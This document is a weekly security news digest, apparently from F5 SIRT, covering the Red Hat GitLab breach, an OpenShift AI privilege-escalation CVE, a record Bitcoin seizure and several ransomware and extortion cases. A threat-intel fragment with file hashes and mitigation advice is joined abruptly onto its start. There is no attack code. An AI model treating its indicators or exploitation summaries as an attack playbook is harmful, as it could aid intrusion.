a0eed0e1ef8fc4129f630e6f68c29c357c717df0fe352961e92e7f8c93e5371b, a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92, b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b, ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6, c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b, cbb94dd87c3ce335c75e57621412eedce013fcc77ac92ec57f7e74ac70dde119, cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7, e03b8c54ac916b363f956e4e4e04a19eb4119455d8006c92e9328e16a8cee52f Victim Industries: Agriculture, Automotive, Business Services, Critical Manufacturing, Defense, Digital Media, Education, Energy, Engineering, Financial Services, Government, Hospitality, Information Technology, Legal and Professional Services, Logistics, Manufacturing, Professional Services, Retail, Telecommunications, Transportation, Transportation & Logistics, Utilities Victim Countries: Austria, Belarus, Belgium, Bulgaria, Canada, China, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Israel, Italy, Latvia, Lithuania, Luxembourg, Malta, Myanmar, Netherlands, Norway, Poland, Portugal, Romania, Russia, Slovakia, Slovenia, South Korea, Spain, Sweden, Ukraine, United States Mitigation Advice Use endpoint management or scripting tools to scan all Windows systems for a scheduled task named "DavaniGulyashaSdeshka" and alert on or remove any findings. Identify all installations of WinRar in the environment and ensure they are updated to a version that is not vulnerable to the zero-day exploit mentioned. Configure email security gateways to block or quarantine emails from external sources that contain executable files or compressed archives like .rar and .zip. Scan the network to identify all systems running SMBv1 and disable the protocol wherever it is not essential for business operations. Compliance Best Practices Implement and regularly test a 3-2-1 backup strategy, ensuring at least one copy of critical data is stored offline, air-gapped, or in an immutable storage repository to protect it from wiper malware. Develop and roll out a continuous security awareness training program that includes phishing simulations to educate employees on how to identify and report suspicious emails. Implement network segmentation to create isolated zones for critical servers and services, restricting communication paths from user workstations to limit the lateral movement of malware. Deploy an application control or allowlisting solution on endpoints, particularly servers, to restrict software execution to only known and approved applications.Red Hat in the news, £5.5B in Bitcoin recovered from scammer, more Breaches
Hello! ArvinF is your editor of the F5 SIRT This Week in Security, covering 28 September to 4 October 2025. This week, Red Hat is in the news for their Consulting GitLab instance breach and an "Important" rated vulnerability in their OpenShift AI Service product. A win - UK's Metropolitan police have arrested a scammer and recovered £5.5B (!) in Bitcoin. Then came the breach disclosures from Alianz, Westjet, Motility and a "US tech company”. Finally, the ransomware and extortion gangs - Scattered LAPSUS$ Hunters 1B Salesforce record under ransom and Radiant Group's extortion attempt getting slammed by another extortion group. Let’s get to it! Red Hat's Consulting GitLab instance has been breached by an extortion group named Crimson Collective. The group initially bragged about the breach on Telegram, showing file listings and other sensitive data in Customer Engagement Reports (CERs) that are related to Redhat customers environments. Redhat published a security incident advisory: We recently detected unauthorized access to a GitLab instance used for internal Red Hat Consulting collaboration in select engagements. Upon detection, we promptly launched a thorough investigation, removed the unauthorized party’s access, isolated the instance, and contacted the appropriate authorities. Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance. Crimson Collective threat group notes that they found authentication tokens inside these repos and have “already used these to compromise downstream Red Hat customers.” In an advisory from the Belgian government, it notes the incident is “High Risk” for Belgian organizations and has “potential supply chain impact if service providers or IT partners worked with Red Hat Consulting” From the same advisory, it provided recommendations: Revoke & Rotate all tokens, keys, and credentials shared with Red Hat or used in integrations. Engage Third-Parties – ask your IT providers or partners whether they have used Red Hat Consulting and assess your potential exposure. Contact Red Hat for guidance on your specific exposure. Increase monitoring of authentication events, API calls, and system access for anomalies. https://www.theregister.com/2025/10/03/red_hat_gitlab_breach/ https://www.redhat.com/en/blog/security-update-incident-related-red-hat-consulting-gitlab-instance https://www.theregister.com/2025/10/02/cybercrims_claim_raid_on_28000/ https://ccb.belgium.be/news/hackers-crimson-collective-use-leaked-authentication-tokens-access-customer-systems From standard user to Full Cluster Admin in Red Hat Openshift AI Service via CVE-2025-10725 Red Hat OpenShift AI Service has a 9.9 out of 10 CVSS Score CVE, tracked as CVE-2025-10725, thinly avoiding a 10 out of 10, due to a requirement of a Low-Privileged attacker. https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H In the advisory: A flaw was found in Red Hat OpenShift AI Service. A low-privileged attacker with access to an authenticated account, for example as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator. This allows for the complete compromise of the cluster’s confidentiality, integrity, and availability. The attacker can steal sensitive data, disrupt all services, and take control of the underlying infrastructure, leading to a total breach of the platform and all applications hosted on it. To resolve the vulnerability, upgrade to RHOAI 2.16.3 or if Kueue features are not required, the Kueue component management state can be set to “Removed” in the RHOAI DataScienceCluster resource. For RHOAI 2.19+, a workaround is Prevent the RHOAI operator from managing the kueue-batch-user-rolebinding then Disable the ClusterRoleBinding by updating its subject to a different, non-existent, group. Once updates providing fixes have been applied, it's recommended to remove the clusterrolebinding. This “Important” rated CVE came out approx the same time as the Red Hat Consulting GitLab breach. https://www.theregister.com/2025/10/01/critical_red_hat_openshift_ai_bug/ https://access.redhat.com/security/cve/cve-2025-10725#cve-affected-packages £5.5B in Bitcoin recovered from scammer A scammer caught by the London Metropolitan Police after a seven-year investigation and recovered a record-busting Bitcoin seizure worth £5.5B. .. carried out what the police describe as a "large-scale fraud in China" between 2014 and 2017, and then attempted to launder the significant proceeds after arriving in the UK. The three-year fraud affected more than 128,000 people and netted 61,000 Bitcoin, which at current prices is worth more than £5.5 billion ($7.4 billion). At the point the crypto tokens were seized, they would have been worth around $404 million. The scammer fled using false documents and entered the UK and attempted to launder the stolen money by buying property, said the Met. An associate helped in attempting to cash in on the laundering by buying properties in the UK and Dubai. This associate was caught last year and was jailed/sentenced. The scammer may get additional time if they fail to pay up and return more than £3.1 million. The Crown Prosecution Service said the associate benefited by £3.5 million (c $4.7 million) from the fraud, led by the scammer, and the £3.1 million figure was the total sum of her available assets at the time. Reforms to crime legislation under the previous Conservative government aimed to make it easier for the UK authorities to seize, freeze and recover crypto assets, external. The changes would also allow some victims to apply for the release of their assets held in accounts. https://www.theregister.com/2025/09/30/met_police_bitcoin_fraud/ https://www.bbc.com/news/articles/cy0415kk3rzo https://news.met.police.uk/news/woman-convicted-following-worlds-largest-seizure-501569 https://www.gov.uk/government/news/new-powers-to-seize-cryptoassets-used-by-criminals-go-live 3.7M breach notification letters - The mailman and mail servers will be busy sending breach notification letters. From the Maine AG breach disclosure pages on affected persons: Insurance biz Allianz Life - 1,497,036 WestJet - 1.2 million Motility - 766670 From the news ... "US tech company" - 250,000 The Impact: Allianz Life - The attackers accessed the data of the insurer's customers, staff, and financial professionals WestJet - affected its online services and mobile app, exposed customer data - could include names, contact details, information and documents provided in connection with their reservation and travel, and data regarding victims' Motility Software Solutions - "unauthorized actor deployed malware that encrypted a portion of our systems. Although the malware primarily restricted our access to internal data, the forensic evidence suggests that, before encryption, the actor may have removed limited files containing customers' personal data ... could include full names, home and email addresses, telephone numbers, dates of birth, SSNs, and driver's license numbers." That’s a lot of names, SSNs, CCs, email addresses, addresses, IDs. All three businesses offered identity protection and credit monitoring services – Allianz Life and WestJet two years of coverage, Motility 12 months. https://www.theregister.com/2025/10/01/north_american_data_breaches/ Scattered LAPSUS$ Hunters 1B Salesforce Records under ransom Scattered LAPSUS$ Hunters gave Salesforce until October 10, a deadline to negotiate payment or leak their customer’s data. Scattered LAPSUS$ Hunters are 3 threat / ransomware groups - Scattered Spider, ShinyHunters, and Lapsus$ - that had a moment of solidarity "to break into businesses' networks, steal their data, and force an extortion payment." Per Salesforce advisory: "We are aware of recent extortion attempts by threat actors, which we have investigated in partnership with external experts and authorities," "Our findings indicate these attempts relate to past or unsubstantiated incidents, and we remain engaged with affected customers to provide support," "At this time, there is no indication that the Salesforce platform has been compromised, nor is this activity related to any known vulnerability in our technology." In August of 2025, there was the Salesloft drift breach that affected Salesforce customers. https://www.theregister.com/2025/10/03/scattered_lapsus_hunters_latest_leak/ https://www.theregister.com/2025/09/14/in_brief_infosec/ https://www.theregister.com/2025/09/08/drift_breach_entry_salesloft_github/ https://www.theregister.com/2025/08/12/scattered_spidershinyhunterslapsus_cybercrime_collab/ https://status.salesforce.com/generalmessages/20000224?locale=en-US Radiant Group extortion gang crosses the line and gets schooled by other ransomware groups Radiant Group stole data from Kido International, a school for young children with branches in the UK, US, and India. They then posted unblurred pictures of 10 children, along with their addresses, parents’ names, and other personal data, and threatened to expose more if a ransom wasn't paid. Parents of some children claimed to have received threatening calls after Radiant published the data. London's Metropolitan Police investigators are following up on the case. But now, Radiant says it removed the child data it had posted after receiving pressure from other ransomware groups. It seems they crossed a line in the criminal world and backed down when called out for it. Rebecca Taylor, a threat intelligence knowledge manager at security biz Sophos, tells The Register that the crew was called out by the well-established ransomware-as-a-service Nova gang on the Russian Anonymous Market Place (RAMP), an online souk for cybercriminals. One of Nova's affiliate members, going under the handle BlackBeard, told Radiant, "reputation important, don't attack child right." "We have disabled any attacks relating to them, is not allowed anymore," Radiant answered, and added, "Any data relating to under 18s who attended have been deleted." BlackBeard congratulated them and wished the extortionists good luck for the future and Nova offered to help in future raids. Radiant claimed to have information on over 8,000 children enrolled at Kido, as well as their family, teachers, and staff. Taylor told us that the Radiant Group seems to be new script kiddies on the block and have overstepped themselves, and are now trying to make nice with the rest of the criminal community. https://www.theregister.com/2025/10/02/ransomware_radiant_delete_kids_info/ https://www.theregister.com/2025/09/25/ransomware_gang_publishes_toddlers_images/ https://www.theguardian.com/technology/2025/oct/02/kido-nursery-hackers-say-they-have-deleted-stolen-data Outro The amount of breach news from this week was something - the leaked personal and financial information will surely be the foundation of future breaches and extortions. These breaches were perpetrated by ransomware and extortion gangs that utilized social engineering and known and unknown vulnerabilities in their campaigns. As defenders, we should advise our organizations to keep our systems updated, implement levels and layers of security defenses and keep ourselves and our peers educated on good security practices. The silver lining is the recovery of the £5.5B worth of Bitcoin from scammers caught in the UK. The many victims of scammers have an opportunity to recover their lost assets. Credit to the original source and posts! I hope the news I picked is informative and educational. Till next time - Stay Safe and Secure! As always, if this is your first TWIS, you can always read past editions. We also encourage you to check out all of the content from the F5 SIRT.
